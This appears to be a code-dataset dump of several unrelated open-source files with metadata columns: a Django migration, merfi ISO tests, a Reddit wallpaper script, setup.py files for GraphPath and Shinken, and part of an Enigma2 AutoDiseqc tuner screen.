u'montanha.expense': {
'Meta': {'object_name': 'Expense'},
'date': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mandate': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Mandate']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Supplier']"}),
'value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'})
},
u'montanha.expensenature': {
'Meta': {'object_name': 'ExpenseNature'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
u'montanha.institution': {
'Meta': {'object_name': 'Institution'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'siglum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'})
},
u'montanha.legislator': {
'Meta': {'object_name': 'Legislator'},
'about': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'original_id': ('django.db.models.fields.TextField', [], {}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'montanha.legislature': {
'Meta': {'object_name': 'Legislature'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
u'montanha.mandate': {
'Meta': {'object_name': 'Mandate'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislator': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislator']"}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.PoliticalParty']", 'null': 'True', 'blank': 'True'})
},
u'montanha.pernature': {
'Meta': {'object_name': 'PerNature'},
'date_end': ('django.db.models.fields.DateField', [], {}),
'date_start': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']", 'null': 'True', 'blank': 'True'}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"})
},
u'montanha.pernaturebyyear': {
'Meta': {'object_name': 'PerNatureByYear'},
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
u'montanha.politicalparty': {
'Meta': {'object_name': 'PoliticalParty'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'siglum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'wikipedia': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'montanha.supplier': {
'Meta': {'object_name': 'Supplier'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['montanha'] | agpl-3.0 | -336,951,130,467,373,200 | 68.293333 | 151 | 0.560185 | false |
alfredodeza/merfi | merfi/tests/test_iso.py | 1 | 1951 | import os
import pytest
import subprocess
from merfi.iso import Iso
from merfi.util import which
class TestIso(object):
def create_fake_iso(self, output_dir):
""" Create a fake ISO file, without genisoimage """
iso = Iso([])
f = output_dir.join('test.iso')
f.write('ISOCONTENTS')
iso.output = str(f)
iso.make_sha256sum()
return iso
def create_real_iso(self, output_dir):
""" Create a "real" ISO file, using make_iso() (ie genisoimage) """
# simple contents
compose_dir = output_dir.mkdir('my-test-contents')
f = compose_dir.join('contents.txt')
f.write('This text file will be on our ISO')
iso = Iso([])
argv = ['merfi', str(output_dir.join('my-test-contents'))]
iso.parse_args(argv)
iso.make_iso()
iso.make_sha256sum()
return iso
def test_sha256sum_contents(self, tmpdir):
iso = self.create_fake_iso(tmpdir)
with open(iso.output_checksum, 'r') as chsumf:
assert chsumf.read() == "d8d322f6864229f8c9ef1b0845dd9e182c563c508fec30618fdb9b57c70a0147 test.iso\n"
# Validate output_checksum's syntax with sha256sum.
# The reason we shell out to sha256sum here is that it functionally
# validates what a user would do with this ISO's checksum file: a user
# would run `sha256sum -c` on it.
@pytest.mark.skipif(which('sha256sum') is None, reason='sha256sum is not installed')
def test_sha256sum_command(self, tmpdir):
iso = self.create_fake_iso(tmpdir)
os.chdir(os.path.dirname(iso.output_checksum))
assert subprocess.call(['sha256sum', '-c', iso.output_checksum]) == 0
@pytest.mark.skipif(which('genisoimage') is None, reason='genisoimage is not installed')
def test_make_iso(self, tmpdir):
iso = self.create_real_iso(tmpdir)
assert os.path.isfile(str(tmpdir.join('my-test-contents-dvd.iso')))
| mit | -8,617,623,521,715,342,000 | 38.02 | 114 | 0.644285 | false |
roccoma504/reddit_wallpaper | reddit_mac_wallpaper.py | 1 | 1030 | #!/usr/bin/python
# This script changes the wallpaper of the current OSX desktop. It will change the wallpaper of the desktop on each screen but not each desktop.
from AppKit import NSWorkspace, NSScreen
from Foundation import NSURL
import os
import praw
import urllib
# Define the reddit object.
r = praw.Reddit(user_agent='User-Agent: osx:com.frocco.reddit_wallpaper:v0.1 (by /u/roclobster)')
# Retrieve and save the top image of /r/WQHD_Wallpaper
testfile = urllib.URLopener()
testfile.retrieve(list(r.get_subreddit('WQHD_Wallpaper').get_top(limit=1))[0].url, "reddit_wallpaper.jpg")
# Generate a fileURL for the desktop picture
file_url = NSURL.fileURLWithPath_(os.getcwd() + "/reddit_wallpaper.jpg")
# Get shared workspace
ws = NSWorkspace.sharedWorkspace()
# Iterate over all screens
for screen in NSScreen.screens():
# Tell the workspace to set the desktop picture
(result, error) = ws.setDesktopImageURL_forScreen_options_error_(file_url, screen, {}, None)
if error:
print error
exit(-1) | mit | 7,633,890,986,158,433,000 | 33.366667 | 144 | 0.74466 | false |
gjhiggins/graphpath | setup.py | 1 | 3436 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
def setup_python3():
# Taken from "distribute" setup.py
from distutils.filelist import FileList
from distutils import dir_util, file_util, util, log
from os.path import join, exists
tmp_src = join("build", "src")
if exists(tmp_src):
dir_util.remove_tree(tmp_src)
log.set_verbosity(1)
fl = FileList()
for line in open("MANIFEST.in"):
if not line.strip():
continue
fl.process_template_line(line)
dir_util.create_tree(tmp_src, fl.files)
outfiles_2to3 = []
for f in fl.files:
outf, copied = file_util.copy_file(f, join(tmp_src, f), update=1)
if copied and outf.endswith(".py"):
outfiles_2to3.append(outf)
util.run_2to3(outfiles_2to3)
# arrange setup to use the copy
sys.path.insert(0, tmp_src)
return tmp_src
# Find version. We have to do this because we can't import it in Python 3 until
# its been automatically converted in the setup process.
def find_version(filename):
_version_re = re.compile(r'__version__ = "(.*)"')
for line in open(filename):
version_match = _version_re.match(line)
if version_match:
return version_match.group(1)
__version__ = find_version('graphpath/__init__.py')
config = dict(
name="GraphPath",
version=__version__,
author="Arnold deVos",
author_email="[email protected]",
url="http://www.langdale.com.au/GraphPath/",
maintainer="Graham Higgins",
maintainer_email="[email protected]",
packages=['graphpath', 'graphpath.util'],
description="A little-language for analysing" +
" graph-structured data, especially RDF.",
long_description=""""A little-language for analysing RDF,
the syntax of the GraphPath is reminiscent of Xpath.
The graphpath package provides a query evaluator
and a goal-driven inference engine for this language,
which work together to perform graph analysis. The package
can be teamed up with your favourite python RDF API
(e.g. Redland, RDFLib, or your own API).
""",
license='GNU General Public License (GPL)',
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 2.5",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Natural Language :: English",
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Internet :: RDF'
],
test_suite="test",
)
install_requires = ["rdflib>=3.0"]
if sys.version_info[0] >= 3:
from setuptools import setup
config.update({'use_2to3': True})
config.update({'src_root': setup_python3()})
else:
try:
from setuptools import setup
config.update({'test_suite': "nose.collector"})
except ImportError:
from distutils.core import setup
config['install_requires'] = install_requires
setup(**config)
| gpl-2.0 | 8,497,947,675,394,319,000 | 32.686275 | 79 | 0.634459 | false |
xorpaul/shinken | setup.py | 1 | 23086 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# Shinken requires Python 2.6, but does not support Python 3.x yet.
import sys
try:
python_version = sys.version_info
except:
python_version = (1, 5)
if python_version < (2, 6):
sys.exit("Shinken require as a minimum Python 2.6.x, sorry")
elif python_version >= (3,):
sys.exit("Shinken is not yet compatible with Python3k, sorry")
from setuptools import setup, find_packages
from glob import glob
import os
import itertools
import ConfigParser
try:
import pwd
import grp
except ImportError:
# assume non-unix platform
pass
DEFAULT_OWNER = 'shinken'
DEFAULT_GROUP = 'shinken'
from distutils import log
from distutils.core import Command
from distutils.command.build import build as _build
from distutils.command.install import install as _install
from distutils.util import change_root
from distutils.errors import DistutilsOptionError
# We try to see if we are in a full install or an update process
is_update = False
if 'update' in sys.argv:
print "Shinken Lib Updating process only"
sys.argv.remove('update')
sys.argv.insert(1, 'install')
is_update = True
# If we install/update, for the force option to always overwrite the
# shinken lib and scripts
if 'install' in sys.argv and not '-f' in sys.argv:
sys.argv.append('-f')
is_install = 'install' in sys.argv
# Utility function to read the README file. This was directly taken from:
# http://packages.python.org/an_example_pypi_project/setuptools.html
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
class build(_build):
sub_commands = _build.sub_commands + [
('build_config', None),
]
user_options = _build.user_options + [
('build-config', None, 'directory to build the config files to'),
]
def initialize_options(self):
_build.initialize_options(self)
self.build_config = None
def finalize_options (self):
_build.finalize_options(self)
if self.build_config is None:
self.build_config = os.path.join(self.build_base, 'etc')
class install(_install):
sub_commands = _install.sub_commands + [
('install_config', None),
]
user_options = _install.user_options + [
('etc-path=', None, 'read-only single-machine data'),
('var-path=', None, 'modifiable single-machine data'),
('run-path=', None, 'PID files'),
('log-path=', None, 'LOG files'),
('plugins-path=', None, 'program executables'),
('owner=', None, (
'change owner for etc/*, var, run and log folders (default: %s)' % DEFAULT_OWNER
)
),
('group=', None, (
'change group for etc/*, var, run and log folders (default: %s)' % DEFAULT_GROUP
)
),
]
def initialize_options(self):
_install.initialize_options(self)
self.etc_path = None
self.var_path = None
self.run_path = None
self.log_path = None
self.plugins_path = None
self.owner = None
self.group = None
def finalize_options(self):
_install.finalize_options(self)
if self.etc_path is None:
self.etc_path = default_paths['etc']
if self.var_path is None:
self.var_path = default_paths['var']
if self.run_path is None:
self.run_path = default_paths['run']
if self.log_path is None:
self.log_path = default_paths['log']
if self.plugins_path is None:
self.plugins_path = default_paths['libexec']
if self.owner is None:
self.owner = DEFAULT_OWNER
if self.group is None:
self.group = DEFAULT_GROUP
class build_config(Command):
description = "build the shinken config files"
user_options = [
('build-dir=', None, "directory to build the config files to"),
]
def initialize_options (self):
self.build_dir = None
self.build_base = None
self.root = None
self.etc_path = None
self.var_path = None
self.run_path = None
self.log_path = None
self.plugins_path = None
self._install_scripts = None
self.owner = None
self.group = None
def finalize_options (self):
self.set_undefined_options('build',
('build_base', 'build_base'),
('build_config', 'build_dir'),
)
self.set_undefined_options('install',
('install_scripts', '_install_scripts'),
)
self.set_undefined_options('install_config',
('root', 'root'),
('etc_path', 'etc_path'),
('var_path', 'var_path'),
('run_path', 'run_path'),
('log_path', 'log_path'),
('plugins_path', 'plugins_path'),
('owner', 'owner'),
('group', 'group')
)
if self.build_dir is None:
self.build_dir = os.path.join(self.build_base, 'etc')
def run(self):
if not self.dry_run:
self.mkpath(self.build_dir)
# We generate the conf files only for a full install
if not is_update:
self.generate_default_shinken_file()
self.update_configfiles()
self.copy_objects_file()
def generate_default_shinken_file(self):
# The default file must have good values for the directories:
# etc, var and where to push scripts that launch the app.
templatefile = "bin/default/shinken.in"
outfile = os.path.join(self.build_base, "bin/default/shinken")
log.info('generating %s from %s', outfile, templatefile)
if not self.dry_run:
self.mkpath(os.path.dirname(outfile))
bin_path = self._install_scripts
if self.root:
bin_path = bin_path.replace(self.root.rstrip(os.path.sep), '')
# Read the template file
f = open(templatefile)
buf = f.read()
f.close
# substitute
buf = buf.replace("$ETC$", self.etc_path)
buf = buf.replace("$VAR$", self.var_path)
buf = buf.replace("$RUN$", self.run_path)
buf = buf.replace("$LOG$", self.log_path)
buf = buf.replace("$SCRIPTS_BIN$", bin_path)
# write out the new file
f = open(outfile, "w")
f.write(buf)
f.close()
def copy_objects_file(self):
for name in config_objects_file:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
log.info('Copying data files in: %s out: %s' % (inname, outname))
append_file_with(inname, outname, "")
# Creating some needed directories
discovery_dir = os.path.join(self.build_dir + "/objects/discovery")
if not os.path.exists(discovery_dir):
os.makedirs(discovery_dir)
for dirname in [self.var_path, self.run_path, self.log_path]:
if self.build_base:
if not is_install:
dirname = os.path.join(self.build_base, os.path.relpath(dirname, '/')) #dirname)
else:
dirname = os.path.join(self.build_base, dirname)
if self.root:
dirname = change_root(self.root, dirname)
if not os.path.exists(dirname):
os.makedirs(dirname)
def update_configfiles(self):
# Here, even with --root we should change the file with good values
# then update the /etc/*d.ini files ../var value with the real var one
# Open a /etc/*d.ini file and change the ../var occurence with a
# good value from the configuration file
for (dname, name) in daemon_ini_files:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
log.info('Updating path in %s->%s: to "%s"' % (inname, outname, self.var_path))
# but we have to force the user/group & workdir values still:
append_file_with(inname, outname, """
#Overriding default values
user=%s
group=%s
workdir=%s
logdir=%s
pidfile=%s/%sd.pid
""" % (self.owner, self.group, self.var_path, self.log_path, self.run_path, dname))
# And now the resource.cfg path with the value of libexec path
# Replace the libexec path by the one in the parameter file
for name in resource_cfg_files:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
log.info('updating path in %s', outname)
update_file_with_string(inname, outname,
"/usr/local/shinken/libexec",
self.plugins_path)
# And update the shinken.cfg file for all /usr/local/shinken/var
# value with good one
for name in main_config_files:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
log.info('updating path in %s', outname)
## but we HAVE to set the shinken_user & shinken_group to thoses requested:
append_file_with(inname, outname, """
shinken_user=%s
shinken_group=%s
workdir=%s
lock_file=%s/arbiterd.pid
local_log=%s/arbiterd.log
""" % (self.owner, self.group, self.var_path, self.run_path, self.log_path)
)
# UPDATE others cfg files too
for name in additionnal_config_files:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
update_file_with_string(inname, outname,
"/usr/local/shinken/var", self.var_path)
# And update the default log path too
log.info('updating log path in %s', outname)
update_file_with_string(inname, outname,
"shinken.log",
"%s/shinken.log" % self.log_path)
class install_config(Command):
description = "install the shinken config files"
user_options = [
('install-dir=', 'd', "directory to install config files to"),
('build-dir=', 'b', "build directory (where to install from)"),
('force', 'f', "force installation (overwrite existing files)"),
('skip-build', None, "skip the build steps"),
]
boolean_options = ['force', 'skip-build']
def initialize_options(self):
self.build_dir = None
self.force = None
self.skip_build = None
self.owner = None
self.group = None
self.root = None
self.etc_path = None # typically /etc on Posix systems
self.var_path = None # typically /var on Posix systems
self.run_path = None # typically /etc on Posix systems
self.log_path = None # typically /var on Posix systems
self.plugins_path = None # typically /libexec on Posix systems
def finalize_options(self):
self.set_undefined_options(
'build',
('build_config', 'build_dir'),
)
self.set_undefined_options(
'install',
('root', 'root'),
('etc_path', 'etc_path'),
('var_path', 'var_path'),
('run_path', 'run_path'),
('log_path', 'log_path'),
('plugins_path', 'plugins_path'),
('owner', 'owner'),
('group', 'group')
)
def run(self):
# If we are just doing an update, pass this
if is_update:
return
#log.warn('>>> %s', self.lib)
log.warn('>>> %s', self.etc_path)
if not self.skip_build:
self.run_command('build_config')
etc_path = self.etc_path
if self.root:
etc_path = change_root(self.root, self.etc_path)
self.outfiles = self.copy_tree(self.build_dir, etc_path)
# if root is set, it's for pacakge, so NO chown
if pwd and not self.root:
# assume a posix system
uid = self.get_uid(self.owner)
gid = self.get_gid(self.group)
for file in self.get_outputs():
log.info("Changing owner of %s to %s:%s", file, self.owner, self.group)
if not self.dry_run:
os.chown(file, uid, gid)
# recursivly changing permissions for etc/shinken and var/lib/shinken
self.recursive_chown(self.etc_path, uid, gid, self.owner, self.group)
self.recursive_chown(self.var_path, uid, gid, self.owner, self.group)
self.recursive_chown(self.run_path, uid, gid, self.owner, self.group)
self.recursive_chown(self.log_path, uid, gid, self.owner, self.group)
def get_inputs (self):
return self.distribution.configs or []
def get_outputs(self):
return self.outfiles or []
def recursive_chown(self, path, uid, gid, owner, group):
log.info("Changing owner of %s to %s:%s", path, owner, group)
if not self.dry_run:
os.chown(path, uid, gid)
for dirname, dirs, files in os.walk(path):
for path in itertools.chain(dirs, files):
path = os.path.join(dirname, path)
os.chown(path, uid, gid)
@staticmethod
def get_uid(user_name):
try:
return pwd.getpwnam(user_name)[2]
except KeyError, exp:
raise DistutilsOptionError("The user %s is unknown. "
"Maybe you should create this user"
% user_name)
@staticmethod
def get_gid(group_name):
try:
return grp.getgrnam(group_name)[2]
except KeyError, exp:
raise DistutilsOptionError("The group %s is unknown. "
"Maybe you should create this group"
% group_name)
def ensure_dir_exist(f):
dirname = os.path.dirname(f)
if not os.path.exists(dirname):
os.makedirs(dirname)
def append_file_with(infilename, outfilename, append_string):
f = open(infilename)
buf = f.read()
f.close()
ensure_dir_exist(outfilename)
f = open(outfilename, "w")
f.write(buf)
f.write('\n')
f.write(append_string)
f.close()
def gen_data_files(*dirs):
results = []
for src_dir in dirs:
#print "Getting all files from", src_dir
for root, dirs, files in os.walk(src_dir):
for file in files:
results.append(os.path.join(root, file))
return results
def update_file_with_string(infilename, outfilename, match, new_string):
f = open(infilename)
buf = f.read()
f.close()
buf = buf.replace(match, new_string)
f = open(outfilename, "w")
f.write(buf)
f.close()
# Set the default values for the paths
if 'win' in sys.platform:
default_paths = {'var': "c:\\shinken\\var",
'etc': "c:\\shinken\\etc",
'log': "c:\\shinken\\var",
'run': "c:\\shinken\\var",
'libexec': "c:\\shinken\\libexec",
}
elif 'linux' in sys.platform or 'sunos5' in sys.platform:
default_paths = {'var': "/var/lib/shinken/",
'etc': "/etc/shinken",
'run': "/var/run/shinken",
'log': "/var/log/shinken",
'libexec': "/usr/lib/shinken/plugins",
}
elif 'bsd' in sys.platform or 'dragonfly' in sys.platform:
default_paths = {'var': "/var/lib/shinken",
'etc': "/usr/local/etc/shinken",
'run': "/var/run/shinken",
'log': "/var/log/shinken",
'libexec': "/usr/local/libexec/shinken",
}
else:
raise "Unsupported platform, sorry"
required_pkgs = ['pycurl']
etc_root = os.path.dirname(default_paths['etc'])
var_root = os.path.dirname(default_paths['var'])
# nagios/shinken global config
main_config_files = ('shinken.cfg',)
additionnal_config_files = (
'skonf.cfg',
)
config_objects_file = (
'discovery_runs.cfg',
'templates.cfg',
'dependencies.cfg',
'timeperiods.cfg',
'time_templates.cfg',
'contacts.cfg',
'discovery_rules.cfg',
'hosts/localhost.cfg',
'services/services.cfg',
'contactgroups.cfg',
'escalations.cfg',
'commands.cfg',
'discovery.cfg',
'servicegroups.cfg',
'hostgroups.cfg',
'certs/server.pem',
'certs/client.pem',
'certs/ca.pem',
)
#print "SRV PACK FILES", srv_pack_files
config_objects_file_extended = list(config_objects_file)
all_etc_files = []
# Do not put daemons in this list, because it will override other modification
for p in ['packs', 'arbiters', 'brokers', 'modules',
'pollers', 'reactionners', 'realms', 'receivers', 'schedulers']:
# Get all files in this dir
_files = gen_data_files('etc/%s' % p)
# We must remove the etc from the paths
_files = [s.replace('etc/', '') for s in _files]
# Declare them in your global lsit now
config_objects_file_extended.extend(_files)
# Now service packs files
#srv_pack_files = gen_data_files('etc/packs')
#srv_pack_files = [s.replace('etc/', '') for s in srv_pack_files]
# Now service packs files
#srv_pack_files = gen_data_files('etc/packs')
# We must remove the etc from the paths
#srv_pack_files = [s.replace('etc/', '') for s in srv_pack_files]
#config_objects_file_extended.extend(srv_pack_files)
# Setup ins waiting for a tuple....
config_objects_file = tuple(config_objects_file_extended)
print config_objects_file
# daemon configs
daemon_ini_files = (('broker', 'daemons/brokerd.ini'),
('receiver', 'daemons/receiverd.ini'),
('poller', 'daemons/pollerd.ini'),
('reactionner', 'daemons/reactionnerd.ini'),
('scheduler', 'daemons/schedulerd.ini'),
)
resource_cfg_files = ('resource.cfg',)
# Ok, for the webui files it's a bit tricky. we need to add all of them in
#the package_data of setup(), but from a point of view of the
# module shinken, so the directory shinken... but without movingfrom pwd!
# so: sorry for the replace, really... I HATE SETUP()!
full_path_webui_files = gen_data_files('shinken/webui')
webui_files = [s.replace('shinken/webui/', 'webui/') for s in full_path_webui_files]
package_data = ['*.py', 'modules/*.py', 'modules/*/*.py']
package_data.extend(webui_files)
#By default we add all init.d scripts and some dummy files
data_files = [
(
os.path.join('/etc', 'init.d'),
['bin/init.d/shinken',
'bin/init.d/shinken-arbiter',
'bin/init.d/shinken-broker',
'bin/init.d/shinken-receiver',
'bin/init.d/shinken-poller',
'bin/init.d/shinken-reactionner',
'bin/init.d/shinken-scheduler',
'bin/init.d/shinken-skonf',
]
)
]
# If not update, we install configuration files too
if not is_update:
data_files.append(
(os.path.join(etc_root, 'default',),
['build/bin/default/shinken']
))
# Also add modules to the var directory
for p in gen_data_files('modules'):
_path, _file = os.path.split(p)
data_files.append( (os.path.join(var_root, _path), [p]))
# Also add share files to the var directory
for p in gen_data_files('share'):
_path, _file = os.path.split(p)
data_files.append( (os.path.join(var_root, _path), [p]))
# Also add cli files to the var directory
for p in gen_data_files('cli'):
_path, _file = os.path.split(p)
data_files.append( (os.path.join(var_root, _path), [p]))
# compute scripts
scripts = [ s for s in glob('bin/shinken*') if not s.endswith('.py')]
print "All package _data"
if __name__ == "__main__":
setup(
cmdclass={
'build': build,
'install': install,
'build_config': build_config,
'install_config': install_config
},
name="Shinken",
version="1.4",
packages=find_packages(),
package_data={'': package_data},
description="Shinken is a monitoring tool compatible with Nagios configuration and plugins",
long_description=read('README'),
author="Gabes Jean",
author_email="[email protected]",
license="GNU Affero General Public License",
url="http://www.shinken-monitoring.org",
zip_safe=False,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: GNU Affero General Public License v3',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: System :: Monitoring',
'Topic :: System :: Networking :: Monitoring',
],
install_requires=[
required_pkgs
],
extras_require={
'setproctitle': ['setproctitle']
},
scripts=scripts,
data_files=data_files,
)
print "Shinken setup done"
| agpl-3.0 | 2,659,924,417,819,032,600 | 33.978788 | 100 | 0.560643 | false |
popazerty/dvbapp2-gui | lib/python/Screens/AutoDiseqc.py | 1 | 8796 | from Screens.Screen import Screen
from Components.ConfigList import ConfigListScreen
from Components.ActionMap import ActionMap
from Components.Sources.StaticText import StaticText
from Components.config import config, configfile, getConfigListEntry
from Components.NimManager import nimmanager, InitNimManager
from Components.TuneTest import Tuner
from enigma import eDVBFrontendParametersSatellite, eDVBResourceManager, eTimer
class AutoDiseqc(Screen, ConfigListScreen):
diseqc_ports = [
"A", "B", "C", "D"
]
sat_frequencies = [
# astra 282 S4C
( 12051, 27500, \
eDVBFrontendParametersSatellite.Polarisation_Vertical, eDVBFrontendParametersSatellite.FEC_2_3, \
eDVBFrontendParametersSatellite.Inversion_Off, 282, \
eDVBFrontendParametersSatellite.System_DVB_S, eDVBFrontendParametersSatellite.Modulation_Auto, \
eDVBFrontendParametersSatellite.RollOff_auto, eDVBFrontendParametersSatellite.Pilot_Unknown, \
2018, 2, "Astra 2 28.2e"),
# astra 235 astra ses
( 12168, 27500, \
eDVBFrontendParametersSatellite.Polarisation_Vertical, eDVBFrontendParametersSatellite.FEC_3_4, \
eDVBFrontendParametersSatellite.Inversion_Off, 235, \
eDVBFrontendParametersSatellite.System_DVB_S, eDVBFrontendParametersSatellite.Modulation_Auto, \
eDVBFrontendParametersSatellite.RollOff_auto, eDVBFrontendParametersSatellite.Pilot_Unknown, \
3224, 3, "Astra 3 23.5e"),
# astra 192 zdf
( 11953, 27500, \
eDVBFrontendParametersSatellite.Polarisation_Horizontal, eDVBFrontendParametersSatellite.FEC_3_4, \
eDVBFrontendParametersSatellite.Inversion_Off, 192, \
eDVBFrontendParametersSatellite.System_DVB_S, eDVBFrontendParametersSatellite.Modulation_Auto, \
eDVBFrontendParametersSatellite.RollOff_auto, eDVBFrontendParametersSatellite.Pilot_Unknown, \
1079, 1, "Astra 1 19.2e"),
# hotbird 130 rai
( 10992, 27500, \
eDVBFrontendParametersSatellite.Polarisation_Vertical, eDVBFrontendParametersSatellite.FEC_2_3, \
eDVBFrontendParametersSatellite.Inversion_Off, 130, \
eDVBFrontendParametersSatellite.System_DVB_S, eDVBFrontendParametersSatellite.Modulation_Auto, \
eDVBFrontendParametersSatellite.RollOff_auto, eDVBFrontendParametersSatellite.Pilot_Unknown, \
12400, 318, "Hotbird 13.0e"),
]
SAT_TABLE_FREQUENCY = 0
SAT_TABLE_SYMBOLRATE = 1
SAT_TABLE_POLARISATION = 2
SAT_TABLE_FEC = 3
SAT_TABLE_INVERSION = 4
SAT_TABLE_ORBPOS = 5
SAT_TABLE_SYSTEM = 6
SAT_TABLE_MODULATION = 7
SAT_TABLE_ROLLOFF = 8
SAT_TABLE_PILOT = 9
SAT_TABLE_TSID = 10
SAT_TABLE_ONID = 11
SAT_TABLE_NAME = 12
def __init__(self, session, feid, nr_of_ports, simple_tone, simple_sat_change):
Screen.__init__(self, session)
self["statusbar"] = StaticText(" ")
self["tunerstatusbar"] = StaticText(" ")
self.list = []
ConfigListScreen.__init__(self, self.list, session = self.session)
self["config"].list = self.list
self["config"].l.setList(self.list)
self["key_red"] = StaticText(_("Abort"))
self.index = 0
self.port_index = 0
self.feid = feid
self.nr_of_ports = nr_of_ports
self.simple_tone = simple_tone
self.simple_sat_change = simple_sat_change
self.found_sats = []
if not self.openFrontend():
self.oldref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.session.nav.stopService()
if not self.openFrontend():
if self.session.pipshown:
self.session.pipshown = False
del self.session.pip
if not self.openFrontend():
self.frontend = None
self["actions"] = ActionMap(["SetupActions"],
{
"cancel": self.keyCancel,
}, -2)
self.count = 0
self.state = 0
self.abort = False
